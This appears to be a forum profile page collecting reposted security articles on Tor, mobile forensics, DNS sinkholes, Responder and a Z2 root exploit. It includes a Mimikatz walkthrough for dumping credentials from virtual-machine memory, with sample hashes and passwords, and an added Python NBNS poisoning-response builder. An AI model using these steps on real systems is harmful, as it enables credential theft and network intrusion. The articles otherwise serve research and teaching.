Everything posted by Nytro
-
Tor Is For Everyone: Why You Should Use Tor

EFF recently kicked off our second Tor Challenge, an initiative to strengthen the Tor network for online anonymity and improve one of the best free privacy tools in existence. The campaign, which we've launched with partners at the Freedom of the Press Foundation, the Tor Project, and the Free Software Foundation, is already off to a great start. In just the first few days, we've seen over 600 new or expanded Tor nodes, more than during the entire first Tor Challenge. This is great news, but how does it affect you? To understand that, we have to dig into what Tor actually is, and what people can do to support it. Support can come in many forms, too. Even just using Tor is one of the best and easiest things a person can do to preserve privacy and anonymity on the Internet.

What is Tor?

Tor is a network and a software package that helps you anonymously use the Internet. Specifically, Tor hides the source and destination of your Internet traffic; this prevents anyone from knowing both who you are and what you are looking at (though they may know one or the other). Tor also hides the destination of your traffic, which can circumvent some forms of censorship. Tor has been in development for many years and is very stable and mature. It is regarded as one of the best privacy tools currently in existence and it does not cost you anything.

How does Tor help me?

This graphic shows how Tor and HTTPS can work together to protect your privacy on the Internet. Basically, Tor encrypts the data you send across the Internet in multiple layers, like an onion. Then it sends that data through multiple relays, each one of which peels a layer off the onion until your packet leaves the final relay and gets to its destination. This is called 'onion routing' and it is a fantastic method for keeping privacy on the web. Proper use of Tor, along with HTTPS Everywhere, can be one of the best ways to ensure your browsing will remain anonymous.
But I don't need privacy, I have nothing to hide!

Everyone needs privacy sometimes! For example: perhaps you end up with an embarrassing medical condition and you want to search for information about it, but you don't want Google and every advertiser to know about your bodily functions. Tor can help you keep that information private. Tor can also help prevent online tracking more generally. Proper use of Tor can circumvent most third-party trackers that governments and corporations can use to track your browsing habits and send you obnoxious, intrusive advertisements. Tor can also protect your data from hackers on your network. Tor can also help you get around censorship and firewalls, from the filter at your school or office to firewalls or censorship put in place by your government.

How do I use Tor?

The easiest way to get up and running with Tor is to use the Tor Browser Bundle. It is a version of Firefox that comes preconfigured to use Tor. Tor Browser Bundle is set up to use Tor the right way so that you will avoid a lot of the common pitfalls that can pierce your veil of anonymity. If you prefer a more holistic approach or wish to use Tor for something other than just web browsing, you can use Tails. Tails is an operating system that runs off a live CD. It is configured so that all Internet connections run through Tor, and when you are done, everything that you did is wiped clean from your computer's memory. It never touches your hard drive and leaves no traces on your computer. If you want to use Tor on your Android phone, check out Orbot; it can run your browsing and other programs through Tor.

Tor sounds great. What can I do to help?

To help make Tor faster and more secure, one of the best things you can do is set up a Tor relay. That's what we're asking people to do in our Tor Challenge. The more relays there are in the Tor network, the more speed and security Tor has.
Setting up a relay may also improve your own personal anonymity. But even just using Tor increases the anonymity of all the other users. There's some safety in numbers: if the only people using Tor are those who have a serious need for it, then any use of Tor is suspicious. But if Tor gets used for everything from pizza orders to looking at funny cat photos, then it is much less so.

So if I use Tor will I have perfect anonymity all of the time?

Nothing is foolproof, not even Tor. If you use Tor the wrong way you can end up destroying your own anonymity. If you use Tor to log into Facebook or Gmail, for example, they may not know where you are coming from, but they will certainly know who you are and they may even be able to track your browsing around the web. The Tor Project has posted a list of common mistakes that inexperienced users sometimes make.

When used properly, Tor is one of the best tools for Internet privacy that exists. You can use it to circumvent firewalls in an oppressive country, retain your privacy, or browse the Internet while at school. Setting up and running Tor is easy and it is one of the best things any citizen of the Internet can do to help keep a free and open Internet. And if you can run a Tor relay, or want to commit to boosting the bandwidth on a relay you already run, you can take part in our Tor Challenge and push us over our target while collecting prizes. Check out the Tor Challenge today.

Source: https://www.eff.org/deeplinks/2014/06/why-you-should-use-tor
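The onion-routing paragraph above describes layered encryption in words. The following is an added, runnable illustration; it is not part of the EFF article and does not use Tor's real protocol or cryptography. A toy SHA-256/HMAC stream cipher stands in for Tor's per-hop AES (chosen only so the script needs no third-party packages), and the relay names "guard", "middle", "exit" and the destination are made up. What it demonstrates is the property the article states: each relay peels exactly one layer and so learns only the hop before and after it, and only the exit sees the payload.

```python
import hashlib
import hmac
import json
import os

# Toy stream cipher (SHA-256 counter keystream + HMAC tag). It stands in for the
# real per-hop AES so the script runs without extra packages; it is NOT Tor's
# protocol and is not meant for reuse.
def _keystream(key, nonce, length):
    out = b""
    counter = 0
    while len(out) < length:
        out += hashlib.sha256(key + nonce + counter.to_bytes(4, "big")).digest()
        counter += 1
    return out[:length]

def seal(key, data):
    nonce = os.urandom(16)
    ct = bytes(a ^ b for a, b in zip(data, _keystream(key, nonce, len(data))))
    tag = hmac.new(key, nonce + ct, hashlib.sha256).digest()[:16]
    return nonce + ct + tag

def open_layer(key, blob):
    nonce, ct, tag = blob[:16], blob[16:-16], blob[-16:]
    expected = hmac.new(key, nonce + ct, hashlib.sha256).digest()[:16]
    if not hmac.compare_digest(tag, expected):
        raise ValueError("layer was tampered with or opened with the wrong key")
    return bytes(a ^ b for a, b in zip(ct, _keystream(key, nonce, len(ct))))

def build_onion(path, destination, message):
    """path = [(relay_name, key), ...] from entry to exit; the client holds every key.
    Wrap from the exit inwards so the entry relay's layer ends up outermost."""
    inner = {"deliver_to": destination, "payload": message}   # only the exit can read this
    for name, key in reversed(path):
        blob = seal(key, json.dumps(inner).encode())
        inner = {"next": name, "blob": blob.hex()}
    return bytes.fromhex(inner["blob"])   # outermost layer, handed to path[0]

def route(path, destination, message):
    """Simulate each relay peeling its own layer and record what it could learn."""
    keys = dict(path)
    blob = build_onion(path, destination, message)
    previous, views, delivered = "client", [], None
    for name, _ in path:
        layer = json.loads(open_layer(keys[name], blob))
        views.append({
            "relay": name,
            "from": previous,
            "next": layer.get("next", layer.get("deliver_to")),
            "sees_payload": "payload" in layer,
        })
        if "next" in layer:
            blob = bytes.fromhex(layer["blob"])   # pass the still-wrapped remainder on
        else:
            delivered = (layer["deliver_to"], layer["payload"])
        previous = name
    return views, delivered

# Constructed circuit: three relays with random per-hop keys.
PATH = [("guard", os.urandom(32)), ("middle", os.urandom(32)), ("exit", os.urandom(32))]

if __name__ == "__main__":
    views, delivered = route(PATH, "example.com:443", "GET / HTTP/1.1")
    for v in views:
        print(v)
    print("exit delivered:", delivered)
```

Run it and compare the three views: the guard sees "client" and "middle", the middle sees "guard" and "exit", and only the exit sees the destination and the request. That is also why the article pairs Tor with HTTPS: the exit relay is the one party that does see the payload.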
-
Blackberry Forensics

1.0. UNLOCKED BLACKBERRY DEVICES
Unlocked BlackBerry device with no password

Situation
• BB contains memory card and SIM.
• Which type of data extraction should be performed and in what order?
• Physical, File System, then Logical?

Examiner Considerations:
• There are a variety of tools available to the examiner.
• Start Physical, if supported, then move to File System and Logical.
• Wear Leveling
• A data structure at the logical level, in the form of a logical backup/acquisition, is different than the same record at the physical level.
• ** In rare cases performing a physical with UFED may cause the device to reset itself to factory default.
• This is referred to by Cellebrite as "cache memory reset".

Download: https://digital-forensics.sans.org/summit-archives/dfir14/BlackBerry_Forensic_Nuggets_Shafik_Punja_and_Cindy_Murphy.pdf
-
DNS Sinkhole This paper describes the architecture and configuration of a complete Domain Name Services (DNS) sinkhole system based on open-source software. The DNS sinkhole can be used to provide detection and prevention of malicious and unwanted activity occurring between organization computer systems and the Internet. The system is inexpensive, effective, scalable and easy to maintain. Download: https://www.sans.org/reading-room/whitepapers/dns/dns-sinkhole-33523
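As an added example (not code from the SANS paper, which the abstract does not quote), here is a minimal Python sinkhole front end that does the two things the abstract lists: it answers queries for listed names with an address you control (prevention) and emits a log record for each hit (detection). The blocklist, the sinkhole address 192.0.2.1 and the upstream resolver are constructed assumptions; the wire-format handling follows RFC 1035.

```python
import ipaddress
import struct

SINKHOLE_IP = "192.0.2.1"      # assumption: use an address you control; this one is from the documentation range
BLOCKLIST = {"evil.example", "c2.bad.example"}   # constructed blocklist

def encode_qname(name):
    labels = name.rstrip(".").split(".")
    return b"".join(bytes([len(l)]) + l.encode("ascii") for l in labels) + b"\x00"

def decode_qname(pkt, off):
    labels = []
    while True:
        n = pkt[off]
        off += 1
        if n == 0:
            return ".".join(labels), off
        if n & 0xC0:
            raise ValueError("compression pointer in question section")
        labels.append(pkt[off:off + n].decode("ascii"))
        off += n

def build_query(name, qtype=1, txid=0xBEEF):
    """A plain recursive query; used here only to construct test input."""
    header = struct.pack(">HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    return header + encode_qname(name) + struct.pack(">HH", qtype, 1)

def is_sinkholed(name, blocklist):
    """Match the name and each parent so sub-labels of a listed domain are caught too."""
    labels = name.lower().rstrip(".").split(".")
    return any(".".join(labels[i:]) in blocklist for i in range(len(labels)))

def answer_count(resp):
    return struct.unpack_from(">H", resp, 6)[0]

def handle_query(pkt, blocklist=BLOCKLIST, sinkhole_ip=SINKHOLE_IP, ttl=60):
    """Return (response or None, log record). None means: not listed, relay upstream."""
    txid, flags, qdcount, _, _, _ = struct.unpack_from(">HHHHHH", pkt, 0)
    if flags & 0x8000 or qdcount != 1:
        raise ValueError("not a single-question query")
    qname, off = decode_qname(pkt, 12)
    qtype, qclass = struct.unpack_from(">HH", pkt, off)
    question = pkt[12:off + 4]
    log = {"qname": qname, "qtype": qtype, "action": "forward"}
    if qclass != 1 or not is_sinkholed(qname, blocklist):
        return None, log
    log["action"] = "sinkhole"              # this record is the detection event
    if qtype != 1:
        # Only A queries get the fake address; anything else (AAAA, TXT, ...) gets NOERROR/NODATA.
        return struct.pack(">HHHHHH", txid, 0x8180, 1, 0, 0, 0) + question, log
    header = struct.pack(">HHHHHH", txid, 0x8180, 1, 1, 0, 0)   # QR, RD, RA
    answer = (b"\xC0\x0C"                                        # pointer back to the question name
              + struct.pack(">HHIH", 1, 1, ttl, 4)
              + ipaddress.IPv4Address(sinkhole_ip).packed)
    return header + question + answer, log

def serve(bind=("127.0.0.1", 5353), upstream=("9.9.9.9", 53)):
    """Minimal UDP front end: answer listed names locally, relay the rest to `upstream`
    (an assumed resolver; pick your own). Not run by the demo below."""
    import socket
    srv = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    srv.bind(bind)
    up = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    up.settimeout(2)
    while True:
        pkt, client = srv.recvfrom(512)
        try:
            resp, log = handle_query(pkt)
            if resp is None:
                up.sendto(pkt, upstream)
                resp, _ = up.recvfrom(4096)
        except (ValueError, socket.timeout):
            continue
        print(client[0], log)                   # ship sinkhole hits to your SIEM
        srv.sendto(resp, client)

if __name__ == "__main__":
    for name in ["www.c2.bad.example", "www.example", "evil.example"]:
        resp, log = handle_query(build_query(name))
        print(log, None if resp is None else resp[-4:].hex())
```

The parent-domain match in is_sinkholed is the check worth keeping: malware rarely asks for the bare listed name, so a list entry should cover its sub-labels. The log record, not the fake answer, is what gives you detection: a host that resolves a listed name is the one to go and look at.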
-
Reverse Engineering Malicious Javascript Jose Nazario, Ph.D. <jose@arbor.net> Bad guys want to get malware on your box. They don’t want your security systems to detect their known exploits. So they obfuscate them. By the end of this talk you’ll be armed with techniques to defeat their techniques. Download: https://cansecwest.com/csw07/csw07-nazario.pdf
-
[h=3]Mimikatz Against Virtual Machine Memory Part 2[/h]

Short update to talk about mostly performing the actions from Part 1 on Windows 8+ and Windows Server 2012.

First issue was symbols in windbg. Most importantly, NO symbols for windbg. I found this article that lets you remotely download them: Use the Microsoft Symbol Server to obtain debug symbol files

.sympath SRV*f:\localsymbols*http://msdl.microsoft.com/download/symbols

0: kd> .sympath SRV*f:\localsymbols*http://msdl.microsoft.com/download/symbols
Symbol search path is: SRV*f:\localsymbols*http://msdl.microsoft.com/download/symbols
Expanded Symbol search path is: srv*f:\localsymbols*http://msdl.microsoft.com/download/symbols
0: kd> .reload
Loading Kernel Symbols
...............................................................
Loading User Symbols
Loading unloaded module list
.........

Second issue was creating the dmp file. I tried volatility's imagecopy and The Windows Memory Toolkit. Neither produced a dump file that would work with windbg for Windows 8 or Windows 2012. What did work was VMware's vmss2core utility.

Note: for VMware Workstation/Fusion you need to pass it the .vmsn and .vmem files (shown above). For VMware ESXi I just needed to pass the .vmsn file.

The rest follows the same flow as the previous post:

1. Load the memory.dmp file vmss2core created
2. Fix your symbols (shown above)
3. Load the mimilib.dll file

kd> .load C:\users\user\desktop\mimilib.dll

4. Find the lsass process

kd> !process 0 0 lsass.exe
PROCESS ffffe00112f08080
    SessionId: 0  Cid: 01e8    Peb: 7ff623aac000  ParentCid: 0194
    DirBase: 06291000  ObjectTable: ffffc001f8f0c400  HandleCount:
    Image: lsass.exe

5. Switch to that process

kd> .process /r /p ffffe00112f08080
Implicit process is now ffffe001`12f08080
Loading User Symbols
................................................................

6. Run Mimikatz

kd> !mimikatz

7. Drink Beers

Posted by CG at 11:45 AM
Source: Carnal0wnage & Attack Research Blog: Mimikatz Against Virtual Machine Memory Part 2
-
[h=3]Mimikatz Against Virtual Machine Memory Part 1[/h]

Pentesting is a funny thing. Someone will drop some new way of doing something and then you get to reflect on all those missed opportunities on previous engagements. I remember when MC showed me all the Oracle stuff and I reminisced about the missed shells. This post and part 2 is like that for me.

I can't count the number of times I've had access to the folder full of an organization's virtual machines. I knew you could download the raw disk (vmdk) and use tools like volatility on them to carve out useful pieces of the file system but not memory. While doing some research on vCenter/ESXi I came across a couple of blog posts on the subject:

Extract Windows passwords from VMware .vmem file
WinDbg et l'extension de mimikatz | Blog de Gentil Kiwi
Password dump from a Hyper-V Virtual Machine's memory | vNiklas Virtualization blog

This of course sent me down the rabbit hole to see if I could do it. Remko's post mentions you need a few things:

The Windows debugging tools: Debugging Tools for Windows Direct Download - Remko Weijnen's Blog (Remko's Blog); WinDBG | Blog de Gentil Kiwi
The Windows Memory Toolkit: MoonSols Windows Memory Toolkit | MoonSols
Current mimikatz that supports the windbg magic: https://github.com/gentilkiwi/mimikatz

Gotcha #1: The free version of Windows Memory Toolkit limits the OS and architecture you can do this on. Restrictions are 32-bit up to Windows Server 2008.

The process:

#1 Copy the vmem/vmsn from the remote host

#2 Use moonsols bin2dmp to convert it into a dmp file. (I'm using the for-pay version below)

C:\Users\user\Desktop>Bin2Dmp.exe "Windows Server 2008 x64-b2afd86a.vmem" win2k8.dmp
bin2dmp - v2.1.0.20140115
Convert raw memory dump images into Microsoft crash dump files.
Copyright (C) 2007 - 2014, Matthieu Suiche
Copyright (C) 2012 - 2014, MoonSols Limited
Initializing memory descriptors... Done.
Directory Table Base is 0x124000
Looking for Kernel Base...
Looking for kernel variables... Done.
Loading file... Done.
nt!KiProcessorBlock.Prcb.Context = 0xFFFFF80001B797A0
stuff happens
[0x0000000040000000 of 0x0000000040000000]
[0x000000001DAFE000 of 0x000000
MD5 = E8C2F318FA528285281C21B3141E7C51
Total time for the conversion: 0 minutes 14 seconds.

You should now have a .dmp file you can load into windbg.

#3 Load the dmp file into windbg

Gotcha #2: You may have to run .symfix and .reload

kd> .symfix
kd> .reload
Loading Kernel Symbols
...............................................................
Loading User Symbols
Loading unloaded module list
....

#4 Load the mimilib.dll file

kd> .load C:\users\user\desktop\mimilib.dll
  .#####.   mimikatz 2.0 alpha (x64) release "Kiwi en C" (May 25 2014 21:48:13)
 .## ^ ##.  Windows build 6002
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 '## v ##'   http://blog.gentilkiwi.com/mimikatz             (oe.eo)
  '#####'    WinDBG extension ! * * */

===================================
#         * Kernel mode *         #
===================================
# Search for LSASS process
0: kd> !process 0 0 lsass.exe
# Then switch to its context
0: kd> .process /r /p
# And finally :
0: kd> !mimikatz
===================================
#          * User mode *          #
===================================
0:000> !mimikatz
===================================

The tool output will walk you through the rest.

#5 Find the lsass process

kd> !process 0 0 lsass.exe
PROCESS fffffa800dba26d0
    SessionId: 0  Cid: 023c    Peb: 7fffffd4000  ParentCid: 01e4
    DirBase: 2e89f000  ObjectTable: fffff880056562c0  HandleCount: 1092.
    Image: lsass.exe

#6 Switch to the lsass context, fffffa800dba26d0 in this case

kd> .process /r /p fffffa800dba26d0
Implicit process is now fffffa80`0dba26d0
Loading User Symbols
................................................................
......................

#7 Load mimikatz

kd> !mimikatz

Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : WIN-3C4WXGGN8QE$
Domain            : UNLUCKYCOMPANY
SID               : S-1-5-20
        msv :
         [00000002] Primary
         * Username   : WIN-3C4WXGGN8QE$
         * Domain     : UNLUCKYCOMPANY
         * NTLM       : ea2ed0b14406a168791adf5aee78fd0b
         * SHA1       : ab7bd2f6a64cf857c9d69dd65916622e3dc25424
        tspkg :  KO
---SNIP---
Authentication Id : 0 ; 173319 (00000000:0002a507)
Session           : Interactive from 1
User Name         : Administrator
Domain            : UNLUCKYCOMPANY
SID               : S-1-5-21-2086621178-2413078777-1398328459-500
        msv :
         [00000002] Primary
         * Username   : Administrator
         * Domain     : UNLUCKYCOMPANY
         * LM         : e52cac67419a9a2238f10713b629b565
         * NTLM       : 64f12cddaa88057e06a81b54e73b949b
         * SHA1       : cba4e545b7ec918129725154b29f055e4cd5aea8
        tspkg :
         * Username   : Administrator
         * Domain     : UNLUCKYCOMPANY
         * Password   : Password1
        wdigest :
         * Username   : Administrator
         * Domain     : UNLUCKYCOMPANY
         * Password   : Password1
        kerberos :
         * Username   : Administrator
         * Domain     : UNLUCKYCOMPANY.NET
         * Password   : Password1
         * Key List
---SNIP---

There were a few other gotchas for Windows 8 and Windows 2012. I'll put that in part 2.

CG

Posted by CG at 12:37 PM
Source: Carnal0wnage & Attack Research Blog: Mimikatz Against Virtual Machine Memory Part 1
-
Z2 Root Exploit

Hey guys, this is a cross-post of sorts. I just got root execution on my stock Z2 Tablet and it appears that the same method should work for the Z2 phone. I have a Z2 phone but just haven't tested it on that one yet.

Here is my Linux script to grab the TA partition from Z2: https://mega.co.nz/#!bVYx2I4S!x-9qkv...VfbiAd0jEDDgWY [update, v4]
DooMLoRD's Windows version: http://doomlord.xperia-files.com/dow...Y0X1dJTkRPV1M=

Requirements:
1. Be on an early Z2 phone/tablet firmware. .69 is confirmed working, .402 is confirmed patched
2. Use Linux or something that has 'bash'

Instructions:
1. Extract exploit.tar.gz and run ./root1.sh
2. Crash the system menu that appears by doing System Info -> Configuration or similar.
3. Run ./root2.sh
4. Repeat Step #2
5. Your TA.img should now be in /data/local/tmp. Use adb pull /data/local/tmp/TA.img to retrieve it.

Tell me if it works or if you get any errors. Thanks.

Source: Z2 Root Exploit - xda-developers
-
[h=2]Low level PC attack papers[/h]

BIOS/Firmware: Attacking Intel BIOS
BootKit: eEye BootRoot
Bootkit: Deep Boot
...

Source: A Timeline made with Timeglider, web-based timeline software
-
[h=1]Responder[/h]

Responder is an LLMNR, NBT-NS and MDNS poisoner, with a built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication.

[h=1]INTRODUCTION[/h]

This tool is first an LLMNR, NBT-NS and MDNS responder; it will answer specific NBT-NS (NetBIOS Name Service) queries based on their name suffix (see: NetBIOS Suffixes (16th Character of the NetBIOS Name)). By default, the tool will only answer File Server Service requests, which is for SMB. The concept behind this is to target our answers and be stealthier on the network. This also helps to ensure that we don't break legitimate NBT-NS behavior. You can set the -r option via the command line if you want this tool to answer the Workstation Service request name suffix.

Source: https://github.com/Spiderlabs/Responder
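To make the suffix-based selectivity concrete, here is an added Python illustration (not Responder's own code): it encodes and decodes NBT-NS names with the first-level encoding from RFC 1001/1002, parses a name query as sent to UDP/137, decides whether to answer the way the README describes (File Server Service 0x20 by default, Workstation Service 0x00 only when -r is given), and builds the positive name-query response that carries an attacker-chosen address. The sample names and the 10.0.0.5 address are constructed; the TTL default is an arbitrary choice.

```python
import struct

# Standard NetBIOS name suffixes (the 16th byte of the padded name).
NBNS_SUFFIX = {
    0x00: "Workstation Service",
    0x03: "Messenger Service",
    0x1B: "Domain Master Browser",
    0x1C: "Domain Controllers",
    0x1D: "Master Browser",
    0x1E: "Browser Service Elections",
    0x20: "File Server Service",
}
NB_TYPE = 0x0020   # QTYPE NB (name query)

def encode_nbns_name(name, suffix):
    """RFC 1001/1002 first-level encoding: pad to 15 chars, append the suffix byte,
    then spell every nibble as a letter A..P (32 bytes on the wire)."""
    raw = name.upper().ljust(15)[:15].encode("ascii") + bytes([suffix])
    return b"".join(bytes([(b >> 4) + 0x41, (b & 0x0F) + 0x41]) for b in raw)

def decode_nbns_name(encoded):
    raw = bytes(((encoded[i] - 0x41) << 4) | (encoded[i + 1] - 0x41) for i in range(0, 32, 2))
    return raw[:15].decode("ascii").rstrip(" "), raw[15]

def build_nbns_query(name, suffix, txid=0x1234):
    """A broadcast NB name query, as a Windows host sends it to UDP/137 (constructed input)."""
    header = struct.pack(">HHHHHH", txid, 0x0110, 1, 0, 0, 0)   # 0x0110: RD + broadcast
    question = bytes([32]) + encode_nbns_name(name, suffix) + b"\x00" + struct.pack(">HH", NB_TYPE, 1)
    return header + question

def parse_nbns_query(pkt):
    txid, flags, qdcount, _, _, _ = struct.unpack_from(">HHHHHH", pkt, 0)
    if flags & 0x8000 or qdcount != 1 or pkt[12] != 32:
        raise ValueError("not a single-question NBNS query")
    name, suffix = decode_nbns_name(pkt[13:45])
    qtype, qclass = struct.unpack_from(">HH", pkt, 46)
    return {"txid": txid, "name": name, "suffix": suffix,
            "service": NBNS_SUFFIX.get(suffix, "unknown"),
            "broadcast": bool(flags & 0x0010), "qtype": qtype, "qclass": qclass,
            "encoded_name": pkt[13:45]}

def should_answer(query, answer_workstation=False):
    """The selectivity the README describes: File Server Service (0x20) only,
    plus Workstation Service (0x00) when the operator passes -r."""
    if query["qtype"] != NB_TYPE or query["qclass"] != 1:
        return False
    wanted = {0x20} | ({0x00} if answer_workstation else set())
    return query["suffix"] in wanted

def build_nbns_positive_response(query, ip, ttl=60):
    """Positive name query response pointing the asker at `ip` (the poisoning answer)."""
    header = struct.pack(">HHHHHH", query["txid"], 0x8500, 0, 1, 0, 0)   # response, AA, RD
    rr_name = bytes([32]) + query["encoded_name"] + b"\x00"
    # NB_FLAGS 0x0000 = unique name, B-node; then NB_ADDRESS
    rdata = struct.pack(">H", 0x0000) + bytes(int(o) for o in ip.split("."))
    return header + rr_name + struct.pack(">HHIH", NB_TYPE, 1, ttl, len(rdata)) + rdata

if __name__ == "__main__":
    for name, suffix in [("FILESRV", 0x20), ("WKS01", 0x00), ("CORP", 0x1C)]:
        q = parse_nbns_query(build_nbns_query(name, suffix))
        print(f"{q['name']:<15} <{q['suffix']:02x}> {q['service']:<26} "
              f"answer: default={should_answer(q)} with -r={should_answer(q, True)}")
```

The same parser is useful on the defending side: a host that answers NB queries for names it does not own is a poisoner, and the suffix tells you which service the victim was looking for.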
-
Translate regular Assembly into Extended Instructions

SSEXY - Convert x86 instructions into their SSE equivalents. For more information, read the slides and summary which can be found here: http://jbremer.org/ssexy.zip

Source: https://github.com/jbremer/ssexy
-
[h=3]Monkeying around with Windows Phone 8.0[/h]

[Image: Ah, the wonders of Windows Phone 8.0 ... Failing eyesight, Frustration and Squirrel chasing]

Currently, there is not much freely available documentation on how Windows Phone 8.0 stores data, so it is hoped that the information provided in this post can be used as a stepping stone for further research / possible scripting. Hopefully, analysts will also be able to use this post to help validate any future tool results.

Special Thanks to Detective Cindy Murphy (@CindyMurph), Lieutenant Jennifer Krueger Favour (@rednogn) and the Madison Police Department ("Forensicate Like A Champion!") for providing the opportunity and encouragement for this research.

Unfortunately, due to time constraints and a limited test data set, I wasn't able to write an all-singing/all-dancing script. Instead, some one-off scripts were created to extract/sort the relevant data a lot quicker than it would have taken to do manually. Rather than releasing scripts that are customized for a limited set of test data (which I don't have easy access to any more), this post will be limited to documenting the data sources/structures.

OK, so no free tool and you're still here reading huh? In Yoda voice: "The nerd runs strong in this one"

Thanks to Maggie Gaffney from Massachusetts State Patrol / Teel Technologies, the initial test data (.bin file) was sourced via JTAG from a Nokia 520 Windows 8.0 phone, a "cheap" smart phone common to prepaid plans. The .bin file was then opened in X-Ways Forensics to parse the 28(!) file system partitions and to export out files of interest. The exported files were then viewed in hex view using Cellebrite Physical Analyzer (love the data interpretation and colour coded bookmarking!).

Later, we were also able to get our paws on some test data from a HTC PM23300 Windows Phone 8.0 phone courtesy of JoAnn Gibb from the Ohio Attorney General's Office. It's awesome knowing people that know people!

Note: The Nokia 520 does not display the full SMS timestamp info (threaded messages display date only). So while we can potentially re-create the order of threaded messages as per the test phone, we can't easily validate the exact time an SMS message was sent/received. There's a good chance that other Windows Phone 8.0 phones will use the same timestamp mechanism and hopefully they will display the full timestamp.

[h=3]So where's the data?![/h]

The SMS content, MMS file attachment info and Contacts information are stored (via the 28th Partition) in:
\Users\WPCOMMSSERVICES\APPDATA\Local\Unistore\store.vol

Various .dat files containing MMS content are also stored in sub-directories of:
\SharedData\Comms\Unistore\data

The Call log is stored in:
\Users\WPCOMMSSERVICES\APPDATA\Local\UserData\Phone

The "store.vol" and "Phone" files seem to be ESE Databases (see explanations here and here) with the magic number of "xEF xCD xAB x89" present at bytes 4-8. Consequently, we tried opening "store.vol" using Nirsoft's ESE Database viewer but had limited success: the SMS message texts were not viewable, however other data was. This suggests that maybe the "store.vol" file differs in some way from the ESE specification and/or the tool had issues reading the file. Joachim Metz has also both documented (here and here) and written a C library "libesedb" to extract ESE databases. Unfortunately, I didn't discover Joachim's library until after we started poking around. Anyway, it was a pretty masochistic interesting exercise trying to reverse engineer the "store.vol" file.
One possible benefit of this data diving is that it *might* also reveal unallocated/partially overwritten data records that might be ignored by libraries which read the amount of data declared (vs reading all the data present). This is pure speculation though, as I don't know if old records are overwritten or just marked as invalid.

Viewing "store.vol" using Cellebrite Physical Analyzer, relevant data was observed for text strings (eg phone numbers, SMS text strings) encoded in UTF-16 LE throughout the file. As a database file there will be tables. Each table will have columns of values (eg time, text content, flags). A single (table row) record will thus have data stored for each column. Table data will be organized within the file somehow (eg multiple SMS records organized into page blocks). So it is likely that finding a hit for a specific SMS will lead you to the contents of other SMS messages (potentially around the same timeframe).

The Nokia 520 was actually locked with a 4 digit PIN when we started investigating. Without access to the phone, any manual inspection/validation would have been impossible. It was unknown if the phone would have been wiped if too many incorrect PINs were entered. So any guesses would have to be documented and carefully chosen. It wasn't looking good ... until a combination of thinking outside the box and a touch of luck led us to an SMS text message (in "store.vol") with the required 4 digit code. Open sesame!

[h=3]Some things we tried with the data ...[/h]

To find specific SMS records we searched for unique/known strings from the SMS text (eg "Look! A Squirrel!"). A single record was found per SMS in "store.vol" and each record also contained a UTF-16-LE string set to "SMStext".

To find contact information, we searched for known phone number strings (eg +16085551234, 123456, 1234). Some numbers were observed in "store.vol" in close proximity to "SMStext" strings while other instances were located close to what appeared to be contact information (eg contact names).

To search for field markers and flags, we compared separate SMS text records and looked for patterns/commonalities in the hex. Sometimes the pattern was obvious (eg "SMStext" occurs in each SMS message) and sometimes it wasn't so obvious (sometimes there is no discernible pattern!).

Figuring out the timestamp format being used was HUGE. Without it, we could not have figured out the order messages were sent/received. Using Cellebrite Physical Analyzer to view the "store.vol" hex, Eagle-eyed Cindy noticed that there were 8 byte groupings occurring before/after the SMS text content. These 8 bytes were usually around the same value range (eg in LE xFF03D2315FE1C701). Which is what you'd expect within a single message. Subsequent messages usually had larger values, which corresponds to messages sent/received at a later time. Like most hex viewers, Cellebrite Physical Analyzer can interpret a predefined number of bytes from the current cursor position and print a human friendly version. Using this, Calculon Cindy showed an otherwise oblivious monkey that these 8 byte groupings could be interpreted as MS FILETIME timestamps! To be honest, I was expecting smaller 4 byte timestamps. Silly monkey!

By comparing the 8 byte values surrounding a specific SMS text message (eg "Look! A Squirrel!") with the date displayed on the phone for that message, we theorized that our mysterious timestamps were *probably* MS FILETIME timestamps (No. of 100 ns increments since 1 January 1601 in UTC). For example, xFF03D2315FE1C701 = Sat, 18 August 2007 06:15:37 UTC. As the phone did not display the exact time for each SMS, we could only use the order of threaded messages and the date displayed to somewhat confirm our theory.
Various SMS sent/received dates on the phone were spot checked against a corresponding "store.vol" entry timestamp date and the date values consistently matched.

[h=3]What the data looks like[/h]

After some hex ray vision induced cross-eyedness (who knew that looking at hex is almost like a curse!), we think we've figured out some general data structures for SMS, MMS, Contacts and Call log records. There's still some unknowns/grey areas but it's a start.

- On the data structure diagrams below, "?" is used to denote a varying/unknown number of bytes.
- FILETIMEs are LE 8 byte integers representing the number of 100 ns intervals since 1 JAN 1601.
- In general, strings are null terminated and UTF-16-LE encoded (ie 2 bytes per character).

[h=4]Sent / Received SMS records[/h]

There are two types of SMS data structures which are mixed together. Each type of SMS structure contains a UTF-16-LE encoded string for "SMStext". However, one type contains phone number strings and the other does not. For later ease of understanding, we'll say these "SMStext" records occur in "Area 1".

Initially, monkey was confused about why some SMS records had phone numbers and some didn't. However, by inspecting the unlocked phone, we were able to confirm that the SMS message records with no number corresponded to sent SMS.

[Image: Sent "SMStext" record (from Area 1 in "store.vol")]

Note 1: Note the lack of Phone number information. From test data, FILETIME values (in red and pink) seemed a little inconsistent. Sometimes FILETIMEs within the same record matched each other and other times they varied by seconds/minutes.
Note 2: The Sent Text string (in yellow) is null terminated and encoded in UTF-16-LE.

[Image: Received "SMStext" record (from Area 1 in "store.vol")]

Note 1: Received SMS have multiple source phone number strings listed (in orange). These seem to remain constant within a given record (eg PHONE1 = PHONE2 = PHONE3).
Note 2: Similar to Sent "SMStext" records, the FILETIMEs (in red and pink) within a record might/might not vary.
Note 3: The Received Text string (in yellow) is null terminated and encoded in UTF-16-LE.

To find out the destination phone number for a sent SMS we can make use of the factoid observed by searching "store.vol" for the FILETIMEs from a specific Sent "SMStext" record. It appears that FILETIMEs 1, 3 & 4 (in pink) from a given Sent "SMStext" record usually occur once in the entire "store.vol". The FILETIME2 value (in red) however, also appears in a second area ("Area 2"). This area has a bunch of different looking data records each containing the null terminated UTF-16-LE encoded string for "SMS". Also contained in each data record is a phone number string. The "Area 2" SMS records look like:

[Image: "SMS" record (from Area 2 in "store.vol")]

